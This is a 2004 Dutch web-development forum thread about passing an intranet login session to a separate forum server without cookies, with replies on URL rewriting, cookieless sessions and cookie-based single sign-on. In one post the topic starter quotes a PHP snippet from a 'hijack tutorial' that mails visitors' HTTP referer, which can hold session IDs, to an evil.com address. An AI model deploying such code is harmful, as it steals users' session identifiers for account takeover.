Toon posts:

[ALG] Sessions overnemen *

Pagina: 1
Acties:

maandag 14 juni 2004 10:20

Acties:

Verwijderd

Topicstarter
Ik log in op een intranet. Nu wil ik aan het intranet een forum koppelen, maar ik wil dan niet opnieuw inloggen. Het intranet gebruikt sessions, maar geen cookies. Hoe maak ik dit waar?

maandag 14 juni 2004 10:23

Acties:
  • ACM
  • Registratie: Januari 2000
  • Niet online

ACM

Software Architect

Werkt hier

Als je in hetzelfde domein zit kan je evt de sessie-cookies van het intranet gebruiken om de sessies te identificeren, mits de sessie-cookies van het intranet goed gezet zijn kwa domein.
Als er alleen url-rewriting wordt uitgevoerd voor sessies zal een "externe url" niet zo gauw de sessieID's meekrijgen en zal je het niet waar kunnen maken...

[ Voor 11% gewijzigd door ACM op 14-06-2004 10:24 ]

maandag 14 juni 2004 10:33

Acties:

Verwijderd

Topicstarter
Nogmaals, we gebruiken geen cookies.

Nu had ik dit gevonden in een Hijack tutorial:

code:
1
2
3
4

<?php
if (isset($_SERVER['HTTP_REFERER']))
    mail('owner@evil.com', 'referer logged', $_SERVER['HTTP_REFERER)
?>


Is er zoiets mogelijk met link()? Zo ja, dan heb ik het iig verkeerd gedaan :D

maandag 14 juni 2004 10:37

Acties:
  • curry684
  • Registratie: Juni 2000
  • Laatst online: 12-05 22:23

curry684

left part of the evil twins

Sessions zijn cookies in 99% van de implementaties, tenzij je GET-sessions gebruikt (lelijk!).

Professionele website nodig?

maandag 14 juni 2004 10:58

Acties:

Verwijderd

Topicstarter
curry684 schreef op 14 juni 2004 @ 10:37:
Sessions zijn cookies in 99% van de implementaties, tenzij je GET-sessions gebruikt (lelijk!).
lol, get-sessions bestaan niet...! Je verwart nu 2 termen IMO.

Maar goed, kzal wel ff kijken of ik de temp. cookies uit kan lezen. Verder : zou dat verhaal van HTTP_REFERER kunnen werken?

maandag 14 juni 2004 11:01

Acties:
  • gorgi_19
  • Registratie: Mei 2002
  • Laatst online: 12:49

gorgi_19

Kruimeltjes zijn weer op :9

Verwijderd schreef op 14 juni 2004 @ 10:58:
[...]


lol, get-sessions bestaan niet...! Je verwart nu 2 termen IMO.

Maar goed, kzal wel ff kijken of ik de temp. sessions uit kan lezen. Verder : zou dat verhaal van HTTP_REFERER kunnen werken?
Hij bedoeld cookieless sessions. Standaard hebben sessions een cookie nodig, tenzij je via de querystring werkt.

Digitaal onderwijsmateriaal, leermateriaal voor hbo

maandag 14 juni 2004 11:04

Acties:
  • curry684
  • Registratie: Juni 2000
  • Laatst online: 12-05 22:23

curry684

left part of the evil twins

Verwijderd schreef op 14 juni 2004 @ 10:58:
[...]


lol, get-sessions bestaan niet...! Je verwart nu 2 termen IMO.
Ook via de GET-parameters kun je een sessie-ID doorgeven. Dat het ranzig lelijke URL's oplevert over je hele site gaf ik reeds aan, maar dat het kan is zeker.
gorgi_19 schreef op 14 juni 2004 @ 11:01:
[...]

Hij bedoeld cookieless sessions. Standaard hebben sessions een cookie nodig, tenzij je via de querystring werkt.
In ASP.NET heet het toevallig 'cookieless sessions', maar die naam is niet gestandaardiseerd of zo :) Ik vind het persoonlijk nuttiger om aan te geven waar je het sessionId wel stopt dan waar niet ;)

[ Voor 40% gewijzigd door curry684 op 14-06-2004 11:05 ]

Professionele website nodig?

maandag 14 juni 2004 11:09

Acties:
  • watzie
  • Registratie: Juni 2001
  • Laatst online: 16-05 15:09

watzie

gorgi_19 schreef op 14 juni 2004 @ 11:01:
[...]

Hij bedoeld cookieless sessions. Standaard hebben sessions een cookie nodig, tenzij je via de querystring werkt.
Omdat we dan toch met termen aan het gooien zijn, zeg het dan meteen correct:
Om sessions te ondersteunen heb je of cookies nodig, en als dat niet ondersteunt wordt door de clientbrowser (cq uitgezet is) dan moet de server URL-rewriting ondersteunen.
Dat betekent dus dat de webserver ziet "hee deze request is door een client zonder cookies, ik moet de sessie id dus in de url versleutelen".
Hier hoeft klant nog programmeur dus iets voor te doen, dat gebeurt automatisch.

Wat TS echter wil is volgens mij cookie 'achtige' functionaliteit zoals tweakers.net dat ook doet: onthouden wie de gebruiker was/is zodat ie 'zonder inloggen' meteen weer door kan. Vraag eens aan de tweak crew hoe ze dat doen...

maandag 14 juni 2004 11:12

Acties:
  • watzie
  • Registratie: Juni 2001
  • Laatst online: 16-05 15:09

watzie

TS: wat is nou precies je probleem? Je geeft aan dat je 'inlogt op het intranet'. Je bent dus al ingelogt. Dan weet je toch al wie de user is binnen je serverside code dus gebruik je die user toch op dat forum van je? Snap niet waarom je nou 'sessions wilt overnemen' etc.

maandag 14 juni 2004 11:17

Acties:
  • eXcyle
  • Registratie: Juni 2002
  • Laatst online: 23-05 18:47

eXcyle

is het geen optie om voor je forum een redirect te maken die feitelijk alleen de sessie variabelen in een cookie smijt en je redirect naar het forum ? dat lijkt me de snelste oplossing , een andere oplossing zal zijn om gewoon een forum te maken / zoeken die gebruikt maakt van sessies

maandag 14 juni 2004 11:25

Acties:

Verwijderd

Topicstarter
Kijk het werkt zo:

Ik log in op het intranet
Dan navigeer ik door het menu en klik op het item "forum".

Het forum heeft een eigen login en cookies/headers en al het gemeutel. Ga ik eruit slopen, want dan hoef ik niet in te loggen.

Het forum staat BTW op een andere server.

maandag 14 juni 2004 11:36

Acties:
  • Janoz
  • Registratie: Oktober 2000
  • Laatst online: 12:00

Janoz

Moderator Devschuur®

!litemod

Als je nu eens uitlegt hoe het aan de achterkant werkt ipv op de voorkant. Op deze manier is natuurlijk helemaal niks duidelijk. Hoe zou het forum moeten weten wie er ingelogd is? Hoe kunnen wij je uitleggen hoe je een 1 op 1 mapping maakt voor sessies op het forum en het intranet als je niet aangeeft hoe bij beide de sessies werken?

Het lijkt er een beetje op dat je geen idee hebt waar je mee bezig bent. Je vergeet relevante informatie te vermelden, maar zit aan de andere kant mensen de les te lezen waarvan jij (onterecht) vermoed dat ze er niks van snappen.

Ken Thompson's famous line from V6 UNIX is equaly applicable to this post:
'You are not expected to understand this'

maandag 14 juni 2004 11:38

Acties:
  • curry684
  • Registratie: Juni 2000
  • Laatst online: 12-05 22:23

curry684

left part of the evil twins

watzie schreef op 14 juni 2004 @ 11:09:
[...]

Wat TS echter wil is volgens mij cookie 'achtige' functionaliteit zoals tweakers.net dat ook doet: onthouden wie de gebruiker was/is zodat ie 'zonder inloggen' meteen weer door kan. Vraag eens aan de tweak crew hoe ze dat doen...
Hier is weinig aan uit te leggen toch? :?

Je krijgt gewoon een cookie met een bepaalde expiration date, en daarin je ReactID dat bij terugkomst uniek je sessie identificeert in de Session-tabel in de database. Op het Logout scherm kun je exact zien hoeveel sessies er van jou bekend zijn.

Professionele website nodig?

maandag 14 juni 2004 11:43

Acties:
  • ACM
  • Registratie: Januari 2000
  • Niet online

ACM

Software Architect

Werkt hier

curry684 schreef op 14 juni 2004 @ 11:04:
In ASP.NET heet het toevallig 'cookieless sessions', maar die naam is niet gestandaardiseerd of zo :) Ik vind het persoonlijk nuttiger om aan te geven waar je het sessionId wel stopt dan waar niet ;)
Dan moet je ze "get_or_post_session" noemen :P

maandag 14 juni 2004 11:44

Acties:
  • eXcyle
  • Registratie: Juni 2002
  • Laatst online: 23-05 18:47

eXcyle

Verwijderd schreef op 14 juni 2004 @ 11:25:
Kijk het werkt zo:

Ik log in op het intranet
Dan navigeer ik door het menu en klik op het item "forum".

Het forum heeft een eigen login en cookies/headers en al het gemeutel. Ga ik eruit slopen, want dan hoef ik niet in te loggen.

Het forum staat BTW op een andere server.
dan lijkt me de makelijkste manier dat je de sessie data zodra je naar het forum gaat in een cookie zet, zodat het forum denkt dat de user gewoon in ingeloged.
Je kan de login er wel gewoon uithalen, maar het forum zou toch moeten weten wie er is ingeloged, en om het hele forum op sessies te laten werken zul je een aardig gedeelte moeten herschrijven.

[ Voor 6% gewijzigd door eXcyle op 14-06-2004 12:21 . Reden: Typo's ]

maandag 14 juni 2004 11:58

Acties:
  • curry684
  • Registratie: Juni 2000
  • Laatst online: 12-05 22:23

curry684

left part of the evil twins

ACM schreef op 14 juni 2004 @ 11:43:
[...]

Dan moet je ze "get_or_post_session" noemen :P
POST is wel erg onhandig :X Not to mention onbruikbaar op non-form-based navigatie.

Professionele website nodig?

maandag 14 juni 2004 13:00

Acties:
  • jochemd
  • Registratie: November 2000
  • Laatst online: 29-12-2025

jochemd

Verwijderd schreef op 14 juni 2004 @ 11:25:
Kijk het werkt zo:

Ik log in op het intranet
Hoe log je in? En niet "door mijn username en password in te vullen", maar hoe werkt de huidige authenticatie backend?

maandag 14 juni 2004 13:32

Acties:
  • ACM
  • Registratie: Januari 2000
  • Niet online

ACM

Software Architect

Werkt hier

curry684 schreef op 14 juni 2004 @ 11:58:
POST is wel erg onhandig :X Not to mention onbruikbaar op non-form-based navigatie.
Wat ik bedoel is dat "url rewriting" niet zo netjes is voor een post-form, in zo'n geval moet je eigenlijk de parameter als hidden input in het form verwerken en bij mijn weten doet iig PHP dat bij zijn "url rewriting"-routine.
Pagina: 1
Reageer